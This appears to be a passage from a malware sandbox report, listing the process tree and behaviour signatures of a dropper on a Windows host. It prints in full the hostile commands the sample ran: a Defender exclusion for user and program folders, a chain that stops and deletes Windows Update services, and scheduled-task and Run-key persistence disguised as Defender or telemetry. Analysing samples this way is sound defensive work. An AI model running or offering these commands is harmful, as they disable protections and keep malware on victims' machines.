  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\system32\svchost.exe (PID:1040)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe (PID:1560)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\system32\sihost.exe (PID:2320)
  Command line: sihost.exe
- C:\Windows\System32\svchost.exe (PID:2792)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\System32\RuntimeBroker.exe (PID:3564)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\svchost.exe (PID:4576)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\system32\svchost.exe (PID:1436)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- C:\Windows\System32\svchost.exe (PID:1224)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p
- C:\Windows\system32\svchost.exe (PID:3184)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
- C:\Windows\System32\svchost.exe (PID:2520)
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- C:\Windows\system32\SppExtComObj.exe (PID:4068)
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
- C:\Windows\system32\svchost.exe (PID:2220)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- C:\Windows\System32\svchost.exe (PID:1020)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- C:\Windows\System32\RuntimeBroker.exe (PID:4784)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (PID:3876)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\DllHost.exe (PID:3452)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - C:\Windows\system32\WerFault.exe (PID:2304)
    Command line: C:\Windows\system32\WerFault.exe -u -p 3452 -s 392
    Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\DllHost.exe (PID:3344)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - C:\Windows\system32\WerFault.exe (PID:3560)
    Command line: C:\Windows\system32\WerFault.exe -u -p 3344 -s 984
    Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\svchost.exe (PID:3140)
  Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- C:\Windows\Explorer.EXE (PID:2824)
  Command line: C:\Windows\Explorer.EXE
  Signatures: Suspicious behavior: GetForegroundWindowSpam
  - C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe (PID:3900)
    Command line: "C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
    Signatures: Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe (PID:5068)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID:4712)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
        Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Local\Temp\C4Loader.exe (PID:3080)
          Command line: "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
          Signatures: Executes dropped EXE
        - C:\Users\Admin\AppData\Local\Temp\new2.exe (PID:4348)
          Command line: "C:\Users\Admin\AppData\Local\Temp\new2.exe"
          Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
          - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe (PID:2308)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - C:\Windows\SysWOW64\WerFault.exe (PID:2428)
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 304
            Signatures: Program crash
        - C:\Users\Admin\AppData\Local\Temp\SysApp.exe (PID:3896)
          Command line: "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
          Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
          - C:\Windows\SysWOW64\schtasks.exe (PID:3436)
            Command line: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
            Signatures: Creates scheduled task(s)
            - C:\Windows\System32\Conhost.exe (PID:3856)
              Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe (PID:3992)
          Command line: "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
          Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in Drivers directory; Executes dropped EXE; Suspicious use of SetThreadContext; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WerFault.exe (PID:4956)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 260
      Signatures: Program crash
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID:4320)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID:4804)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\sc.exe (PID:492)
      Command line: sc stop UsoSvc
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID:3532)
      Command line: sc stop WaaSMedicSvc
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID:3052)
      Command line: sc stop wuauserv
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID:4648)
      Command line: sc stop bits
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID:4888)
      Command line: sc stop dosvc
      Signatures: Launches sc.exe
    - C:\Windows\System32\reg.exe (PID:3612)
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    - C:\Windows\System32\reg.exe (PID:4932)
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    - C:\Windows\System32\reg.exe (PID:4924)
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      Signatures: Modifies security service
    - C:\Windows\System32\reg.exe (PID:4960)
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    - C:\Windows\System32\reg.exe (PID:2720)
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID:4808)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\dialer.exe (PID:1924)
    Command line: C:\Windows\System32\dialer.exe
- C:\Windows\system32\svchost.exe (PID:2808)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\svchost.exe (PID:2800)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- C:\Windows\system32\svchost.exe (PID:2732)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\system32\svchost.exe (PID:2700)
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  Signatures: Suspicious use of UnmapMainImage
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (PID:2692)
  Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS
- C:\Windows\system32\svchost.exe (PID:2560)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe (PID:2552)
  Command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe (PID:2352)
  Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\System32\svchost.exe (PID:2180)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\System32\spoolsv.exe (PID:8)
  Command line: C:\Windows\System32\spoolsv.exe
- C:\Windows\System32\svchost.exe (PID:1876)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\system32\svchost.exe (PID:2012)
  Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\System32\svchost.exe (PID:2004)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\System32\svchost.exe (PID:1928)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe (PID:1916)
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\System32\svchost.exe (PID:1828)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe (PID:1804)
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\System32\svchost.exe (PID:1732)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- C:\Windows\system32\svchost.exe (PID:1636)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
- C:\Windows\System32\svchost.exe (PID:1616)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\system32\svchost.exe (PID:1552)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\System32\svchost.exe (PID:1428)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\system32\svchost.exe (PID:1416)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\system32\svchost.exe (PID:1384)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe (PID:1364)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
- C:\Windows\system32\svchost.exe (PID:1252)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\System32\svchost.exe (PID:1032)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\System32\svchost.exe (PID:656)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe (PID:4444)
  Command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
  Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess
  - C:\Windows\SysWOW64\WerFault.exe (PID:4688)
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3900 -ip 3900
  - C:\Windows\SysWOW64\WerFault.exe (PID:1984)
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348
  - C:\Windows\system32\WerFault.exe (PID:1356)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 540 -p 3452 -ip 3452
    Signatures: Suspicious use of NtCreateProcessExOtherParentProcess
  - C:\Windows\system32\WerFault.exe (PID:4440)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 412 -p 3344 -ip 3344
    Signatures: Suspicious use of NtCreateProcessExOtherParentProcess
  - C:\Windows\system32\WerFault.exe (PID:3736)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 608 -p 2348 -ip 2348
    Signatures: Suspicious use of NtCreateProcessExOtherParentProcess
  - C:\Windows\system32\WerFault.exe (PID:5024)
    Command line: C:\Windows\system32\WerFault.exe -pss -s 584 -p 4328 -ip 4328
    Signatures: Suspicious use of NtCreateProcessExOtherParentProcess
- C:\Windows\servicing\TrustedInstaller.exe (PID:3768)
  Command line: C:\Windows\servicing\TrustedInstaller.exe
- C:\Windows\system32\svchost.exe (PID:1448)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- C:\Windows\system32\DllHost.exe (PID:2348)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - C:\Windows\system32\WerFault.exe (PID:100)
    Command line: C:\Windows\system32\WerFault.exe -u -p 2348 -s 476
    Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry
- C:\Windows\system32\DllHost.exe (PID:4328)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - C:\Windows\system32\WerFault.exe (PID:3572)
    Command line: C:\Windows\system32\WerFault.exe -u -p 4328 -s 484
    Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry
Network
MITRE ATT&CK Enterprise v6
Downloads